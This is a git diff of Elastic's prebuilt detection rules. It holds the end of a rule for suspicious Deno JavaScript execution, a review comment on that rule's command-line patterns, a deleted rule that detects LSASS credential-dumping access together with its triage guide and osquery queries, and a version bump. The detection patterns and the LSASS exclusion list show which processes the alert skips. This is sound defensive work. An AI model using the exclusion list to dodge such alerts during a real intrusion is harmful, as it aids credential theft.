"keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ff18d24b-2ba6-4691-a17f-75c4380d0965", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "ff18d24b-2ba6-4691-a17f-75c4380d0965_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json deleted file mode 100644 index d251537890a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json +++ /dev/null 
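Review bot: The `"*http*"` entry in the `process.command_line` list is not constrained to a javascript context, unlike `"*javascript*base64*"` and `"*javascript*import*"`, so any Deno invocation of a remote module URL, which the guide's own false-positive section describes as routine development usage, will match even though the description says the patterns apply "in a javascript context". Either narrow the pattern to match the description, e.g. `"*javascript*http*"`, or amend the description so analysts know that plain remote-module execution triggers the rule. Separately, `?process.pe.original_file_name == "deno.exe"` uses the case-sensitive `==` while `process.name : "deno.exe"` uses the case-insensitive `:`; if the PE resource carries different casing the first branch silently misses it, so `?process.pe.original_file_name : "deno.exe"` would match the treatment given to `process.name`.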
@@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.api-*", - "logs-m365_defender.event-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "LSASS Process Access via Windows API", - "note": "## Triage and analysis\n\n### Investigating LSASS Process Access via Windows API\n\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows component responsible for managing user authentication and security policies. Adversaries may attempt to access the LSASS handle to dump credentials from its memory, which can be used for lateral movement and privilege escalation.\n\nThis rule identifies attempts to access LSASS by monitoring for specific API calls (OpenProcess, OpenThread) targeting the \"lsass.exe\" process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) of the process that accessed the LSASS handle.\n - Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Determine the first time the process executable was seen in the environment and if this behavior happened in the past.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Assess the access rights (`process.Ext.api.parameters.desired_access`field) requested by the process. This [Microsoft documentation](https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights) may be useful to help the interpretation.\n- If there are traces of LSASS memory being successfully dumped, investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the 
PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of `process.executable`, `process.code_signature.subject_name` and `process.Ext.api.parameters.desired_access_numeric` conditions.\n\n### Related Rules\n\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- Potential Credential Access via DuplicateHandle in LSASS - 02a4576a-7480-4284-9327-548a806b5e48\n- LSASS Memory Dump Handle Access - 208dbe77-01ed-4954-8d44-1e5751cb20de\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "api where host.os.type == \"windows\" and \n process.Ext.api.name in (\"OpenProcess\", \"OpenThread\") and Target.process.name : \"lsass.exe\" and \n not \n (\n process.executable : (\n \"?:\\\\ProgramData\\\\GetSupportService*\\\\Updates\\\\Update_*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Program Files (x86)\\\\Asiainfo Security\\\\OfficeScan Client\\\\NTRTScan.exe\",\n \"?:\\\\Program Files (x86)\\\\Blackpoint\\\\SnapAgent\\\\SnapAgent.exe\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Security\\\\EFR\\\\EFRService.exe\",\n \"?:\\\\Program Files (x86)\\\\CyberCNSAgent\\\\osqueryi.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\vpnagent.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\aciseagent.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\vpndownloader.exe\",\n \"?:\\\\Program Files (x86)\\\\eScan\\\\reload.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\*\\\\avp.exe\",\n \"?:\\\\Program Files (x86)\\\\microsoft intune management extension\\\\microsoft.management.services.intunewindowsagent.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Reactive\\\\bin\\\\NableReactiveManagement.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Windows Agent\\\\bin\\\\agent.exe\",\n 
\"?:\\\\Program Files (x86)\\\\Tanium\\\\Tanium Client\\\\TaniumClient.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\\\\CCSF\\\\TmCCSF.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\TMASutility.exe\",\n \"?:\\\\Program Files*\\\\Windows Defender\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Bitdefender\\\\Endpoint Security\\\\EPSecurityService.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\McAfee\\\\AVSolution\\\\mcshield.exe\",\n \"?:\\\\Program Files\\\\EA\\\\AC\\\\EAAntiCheat.GameService.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\agentbeat.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\metricbeat.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\packetbeat.exe\",\n \"?:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiProxy.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiSSLVPNdaemon.exe\",\n \"?:\\\\Program Files\\\\Goverlan Inc\\\\GoverlanAgent\\\\GovAgentx64.exe\",\n \"?:\\\\Program Files\\\\Huntress\\\\HuntressAgent.exe\",\n \"?:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\bin\\\\sbshutdown.exe\",\n \"?:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe\",\n \"?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\*\\\\pmfexe.exe\", \n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Qualys\\\\QualysAgent\\\\QualysAgent.exe\",\n \"?:\\\\Program Files\\\\smart-x\\\\controlupagent\\\\version*\\\\cuagent.exe\",\n \"?:\\\\Program Files\\\\TDAgent\\\\ossec-agent\\\\ossec-agent.exe\",\n \"?:\\\\Program Files\\\\Topaz 
OFD\\\\Warsaw\\\\core.exe\",\n \"?:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\netagent\\\\tm_netagent.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe\",\n \"?:\\\\Program Files\\\\Windows Defender Advanced Threat Protection\\\\MsSense.exe\",\n \"?:\\\\Program Files\\\\Wise\\\\Wise Memory Optimizer\\\\WiseMemoryOptimzer.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQDeployRunner\\\\*\\\\exec\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostw.exe\",\n \"?:\\\\Windows\\\\System32\\\\RtkAudUService64.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exe\"\n ) and not ?process.code_signature.trusted == false\n )\n", - "references": [ - "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "m365_defender", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Target.process.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.Ext.api.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff4599cb-409f-4910-a239-52e4e6f532ff", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Microsoft 
Defender for Endpoint", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/", - "subtechnique": [ - { - "id": "T1003.001", - "name": "LSASS Memory", - "reference": "https://attack.mitre.org/techniques/T1003/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1106", - "name": "Native API", - "reference": "https://attack.mitre.org/techniques/T1106/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 13 - }, - "id": "ff4599cb-409f-4910-a239-52e4e6f532ff_13", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index 971ba33c31a..e1e8e9d2722 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -21,4 +21,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.19.17 +version: 8.19.18-beta.1